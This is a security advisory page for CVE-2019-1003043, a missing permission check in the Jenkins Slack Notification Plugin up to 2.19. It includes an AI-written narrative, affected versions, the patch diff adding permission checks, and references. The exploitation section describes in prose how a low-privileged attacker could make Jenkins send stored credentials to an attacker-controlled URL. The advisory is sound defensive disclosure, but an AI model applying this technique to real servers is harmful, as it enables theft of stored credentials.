Moderate severityNVD Advisory· Published Mar 28, 2019· Updated Aug 5, 2024

CVE-2019-1003043

Description

Jenkins Slack Notification Plugin 2.19 and earlier lacks a permission check, allowing attackers with Overall/Read to capture stored credentials via a crafted URL.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Jenkins Slack Notification Plugin 2.19 and earlier lacks a permission check, allowing attackers with Overall/Read to capture stored credentials via a crafted URL.

Vulnerability

A missing permission check in the Jenkins Slack Notification Plugin versions 2.19 and earlier [1][2][3] allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins [3]. The vulnerability exists in a form validation method that did not perform permission checks [3].

Exploitation

An attacker must have Overall/Read access to the Jenkins instance [2][3]. The attacker first obtains credentials IDs through another method (e.g., other vulnerabilities or information disclosure). Then the attacker crafts a request to the vulnerable form validation endpoint, specifying a URL under their control and the stolen credentials IDs [3]. The plugin will then connect to the attacker's URL using those credentials, effectively sending the credential values (e.g., secret text tokens) to the attacker [3]. Additionally, this form validation method did not require POST requests, making exploitation easier via CSRF (CVE-2019-1003044) if the attacker also tricks an admin into visiting a malicious link [3].

Impact

Successful exploitation allows an attacker to capture Jenkins credentials that are stored as secret text or similar, potentially gaining access to Slack workspaces, other services, or escalating privileges within Jenkins [2][3]. The attacker obtains the plaintext credentials from the attacker-specified URL [3].

Mitigation

Jenkins released Slack Notification Plugin version 2.20 (included in the 2019-03-25 security advisory) which adds proper permission checks and CSRF protection [3]. Users should upgrade to version 2.20 or later. No workaround other than upgrading is mentioned in the references. The vulnerability is not listed on CISA's Known Exploited Vulnerabilities (KEV) catalog as of the publication date.

References

AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package	Affected versions	Patched versions
org.jenkins-ci.plugins:slackMaven	< 2.20	2.20

Affected products

ghsa-coords
pkg:maven/org.jenkins-ci.plugins/slack
Range: < 2.20
Jenkins Project/Jenkins Mattermost Notification Plugincpe-rescue
Range: 2.19 and earlier

Patches

0268bbefdcc2

SECURITY-976

https://github.com/jenkinsci/slack-pluginTim JacombMar 22, 2019via ghsa

commit

1 file changed · +7 −0

src/main/java/jenkins/plugins/slack/SlackNotifier.java+7 −0 modified

@@ -34,6 +34,7 @@
 import org.kohsuke.stapler.DataBoundSetter;
 import org.kohsuke.stapler.QueryParameter;
 import org.kohsuke.stapler.StaplerRequest;
+import org.kohsuke.stapler.verb.POST;
 
 import java.util.NoSuchElementException;
 import java.util.function.Function;
@@ -639,12 +640,18 @@ public String getDisplayName() {
             return PLUGIN_DISPLAY_NAME;
         }
 
+        @POST
         public FormValidation doTestConnection(@QueryParameter("baseUrl") final String baseUrl,
                                                @QueryParameter("teamDomain") final String teamDomain,
                                                @QueryParameter("tokenCredentialId") final String tokenCredentialId,
                                                @QueryParameter("botUser") final boolean botUser,
                                                @QueryParameter("room") final String room,
                                                @AncestorInPath Project project) {
+            if (project == null) {
+                Jenkins.get().checkPermission(Jenkins.ADMINISTER);
+            } else {
+                project.checkPermission(Item.CONFIGURE);
+            }
 
             try {
                 String targetUrl = baseUrl;

Vulnerability mechanics

Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

github.com/advisories/GHSA-22xp-7rcx-xp34ghsaADVISORY
nvd.nist.gov/vuln/detail/CVE-2019-1003043ghsaADVISORY
www.openwall.com/lists/oss-security/2019/03/28/2ghsamailing-listx_refsource_MLISTWEB
www.securityfocus.com/bid/107628mitrevdb-entryx_refsource_BID
github.com/jenkinsci/slack-plugin/commit/0268bbefdcc283effd27be5318770f7e75c6f102ghsaWEB
jenkins.io/security/advisory/2019-03-25/ghsax_refsource_CONFIRMWEB
web.archive.org/web/20200227082607/http://www.securityfocus.com/bid/107628ghsaWEB

News mentions

No linked articles in our index yet.

cvss	0.260
epss	0.000
exploit	0.000
kev	0.000
patch	-0.070
ransomware	0.000